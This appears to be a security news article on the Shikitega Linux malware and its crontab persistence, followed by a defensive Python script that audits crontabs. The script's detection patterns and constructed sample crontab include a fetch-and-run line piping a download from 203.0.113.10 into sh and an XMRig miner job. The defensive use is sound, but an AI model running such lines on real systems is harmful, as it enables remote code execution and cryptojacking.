There’s a new dangerous Linux malware circling the web. Dubbed Shikitega, the malware has been infecting both Linux computers and IoT devices with additional payloads.
How Does the Shikitega Malware Operate to Infect a Linux System?
Discovered by AT&T Alien Labs, the malware is delivered through a multistage infection chain in which each module handles one part of the payload, downloading and executing the next one. The Shikitega malware can be used to obtain full control over the compromised system. The malware also carries a cryptocurrency miner which is “set to persist,” as per the researchers’ findings.
Shikitega downloads and executes Metasploit’s Mettle meterpreter to extend its control over compromised endpoints. The malware also exploits a list of Linux system vulnerabilities to gain high privileges, achieve persistence and run the cryptocurrency miner. It is also noteworthy that the threat uses a polymorphic encoder to evade anti-virus detection. To carry out its malicious activities, the malware leverages cloud services, hosting some of its command-and-control servers there.
How Does Shikitega Malware Achieve Persistence?
Persistence on infected systems is achieved by downloading and executing 5 specific shell scripts and setting 4 crontabs [job schedulers on Unix-like operating systems]: two for the currently logged-in user and two for the root user. If the malware finds that the crontab command is not available on the machine, it installs it.
It is also notable that the crypto-mining component of the malware, which downloads and executes the XMRig miner, sets a crontab of its own, thus making the miner persistent.
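Because the persistence described above lives entirely in the user and root crontabs, a quick defensive check is to parse those crontabs and flag entries that look like download-and-execute loops, miners, or jobs launched from world-writable directories. The following is an added example written for this article, not code from the AT&T Alien Labs report; the crontab text and the address 203.0.113.10 are constructed, and the indicator list is an assumption rather than a signature set for Shikitega.

```python
"""Audit crontab entries for common persistence indicators.

Added example, not from the AT&T Alien Labs write-up. The sample crontab
text below is constructed; the INDICATORS list is an assumption and is
meant as a starting point, not a complete detection rule set.
"""
import re
import subprocess

# Heuristic indicators (assumption: chosen for this example only).
INDICATORS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("world-writable-path", re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+")),
    ("known-miner", re.compile(r"\bxmrig\b", re.IGNORECASE)),
    ("encoded-payload", re.compile(r"base64\s+(-d|--decode)\b")),
]

# Vixie-cron shorthand schedules that replace the five time fields.
SPECIAL = {"@reboot", "@hourly", "@daily", "@weekly", "@monthly", "@yearly", "@annually"}


def parse_crontab(text):
    """Yield (schedule, command) for each job line in a user crontab."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Skip environment assignments such as MAILTO="" or PATH=/usr/bin
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*\s*=", line):
            continue
        if line.split()[0] in SPECIAL:
            schedule, command = re.split(r"\s+", line, maxsplit=1)
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:  # malformed line, nothing to run
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        yield schedule.strip(), command.strip()


def audit_crontab(text, owner):
    """Return findings as (owner, schedule, command, [indicator names])."""
    findings = []
    for schedule, command in parse_crontab(text):
        hits = [name for name, rx in INDICATORS if rx.search(command)]
        if hits:
            findings.append((owner, schedule, command, hits))
    return findings


def audit_all(crontabs):
    """Audit a mapping of owner -> crontab text and merge the findings."""
    findings = []
    for owner, text in crontabs.items():
        findings.extend(audit_crontab(text, owner))
    return findings


# Constructed sample: a developer's crontab with one injected entry.
USER_CRONTAB = """\
MAILTO=""
0 2 * * * /home/dev/bin/backup.sh
*/5 * * * * /tmp/.X11-unix/.update >/dev/null 2>&1
"""

# Constructed sample: a root crontab with a miner and a fetch-and-run job.
ROOT_CRONTAB = """\
@reboot /var/tmp/.cache/xmrig --config /var/tmp/.cache/cfg.json
0 * * * * curl -s http://203.0.113.10/s.sh | sh
30 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

SAMPLE_CRONTABS = {"dev": USER_CRONTAB, "root": ROOT_CRONTAB}


def live_crontab(user):
    """Fetch a real crontab with `crontab -u USER -l`; empty string if none."""
    proc = subprocess.run(["crontab", "-u", user, "-l"], capture_output=True, text=True)
    return proc.stdout if proc.returncode == 0 else ""


if __name__ == "__main__":
    for owner, schedule, command, hits in audit_all(SAMPLE_CRONTABS):
        print(f"[{owner}] {schedule} {command}  <- {', '.join(hits)}")
```

On a live host, replace SAMPLE_CRONTABS with {"root": live_crontab("root"), ...} for each account of interest, and remember that the same indicators apply to /etc/crontab and the files under /etc/cron.d, which this parser does not read because their lines carry an extra user field.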
In conclusion, Shikitega malware is an example of malware delivered in a sophisticated way, using a polymorphic encoder and gradually delivering its payload.
Symbiote, discovered by Blackberry researchers, is another recently discovered Linux malware designed to infect all running processes on infected machines. The malware is capable of stealing account credentials and providing backdoor access to its operators.